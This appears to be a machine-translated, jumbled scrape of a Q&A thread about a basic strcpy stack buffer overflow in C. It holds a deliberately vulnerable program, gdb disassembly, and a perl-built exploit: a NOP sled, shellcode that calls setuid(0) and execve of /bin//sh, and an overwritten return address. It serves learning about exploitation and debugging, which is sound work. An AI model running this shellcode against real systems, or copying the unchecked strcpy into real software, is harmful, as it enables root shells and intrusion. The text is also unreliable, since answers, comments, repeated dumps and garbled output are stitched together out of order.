strcpy的基本缓冲区溢出

strcpy的基本缓冲区溢出,c,buffer-overflow,C,Buffer Overflow,我在这里阅读有关基本缓冲区溢出的内容:。我想我知道发生了什么,所以我制作了自己的程序: //vulnerable1.c #include <stdio.h> #define MAX_DEGF_SIZE 720 int main(int argc, char* argv[]) { char degF[MAX_DEGF_SIZE]; if (argc == 2 && strlen(argv[0]) < MAX_DEGF_SIZE) {

我在这里阅读有关基本缓冲区溢出的内容:。我想我知道发生了什么,所以我制作了自己的程序:

//vulnerable1.c
#include <stdio.h>

#define MAX_DEGF_SIZE 720

int main(int argc, char* argv[])
{
    char degF[MAX_DEGF_SIZE];

    if (argc == 2 && strlen(argv[0]) < MAX_DEGF_SIZE) {
        strcpy(degF, argv[1]);
    } else {
        fprintf(stderr, "degF to degC converter\n");
        fprintf(stderr, "Usage: %s <degF>\n", argv[0]);

        return -1;
    }
}
这里我看到我至少需要732字节。接下来,我将禁用main以查看实际保留了多少字节:

(gdb) disass main
Dump of assembler code for function main:
   0x08048514 <+0>: push   %ebp
   0x08048515 <+1>: mov    %esp,%ebp
   0x08048517 <+3>: and    $0xfffffff0,%esp
   0x0804851a <+6>: sub    $0x2f0,%esp

这里发生了什么

您只需进入
strlen
,它显然是在汇编中实现的,而不是在C中实现的(可能是为了性能)


只需继续单步执行,直到返回到
main
,或者使用
next
跳过函数调用。

您使用的是
strlen(argv[0])
,您的意思是不是
strlen(argv[1])
?OP正在尝试利用示例程序中的漏洞进行攻击。是的,它有错误,而且是故意的。让我们从
argv[0]
开始,它是可执行文件的名称,而不是第一个命令行参数。由于您没有
strcpy()
的源代码对
gdb
可见,你应该只
next
,而不是尝试单步执行该函数调用。发布的代码缺少以下语句:
#include
或break on strcpy调用,使用
break main.c:1234
(使用实际的文件名和行号,而不是main.c和1234),如果我只是简单地使用这些参数运行它,我会得到��...��1.��ð̀1�Rhn/shh//bi��RS���B aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa���� 输出的degF为-17.8 degC分段故障。但还是同一个用户
(gdb) disass main
Dump of assembler code for function main:
   0x08048514 <+0>: push   %ebp
   0x08048515 <+1>: mov    %esp,%ebp
   0x08048517 <+3>: and    $0xfffffff0,%esp
   0x0804851a <+6>: sub    $0x2f0,%esp
gdb -q vulnerable1
Reading symbols from /home/testUser/vulnerable1...done.
(gdb) break main
Breakpoint 1 at 0x8048520: file vulnerable1.c, line 11.
(gdb) r `perl -e 'print "\x90"x704, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`
Starting program: /home/testUser/vulnerable1 `perl -e 'print "\x90"x704, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`

Breakpoint 1, main (argc=2, argv=0xbffff564) at vulnerable1.c:11
11      if (argc == 2 && strlen(argv[0]) < MAX_DEGF_SIZE) {
(gdb) step
__strlen_sse2 () at ../sysdeps/i386/i686/multiarch/strlen.S:70
70  ../sysdeps/i386/i686/multiarch/strlen.S: No such file or directory.
    in ../sysdeps/i386/i686/multiarch/strlen.S
(gdb) step
73  in ../sysdeps/i386/i686/multiarch/strlen.S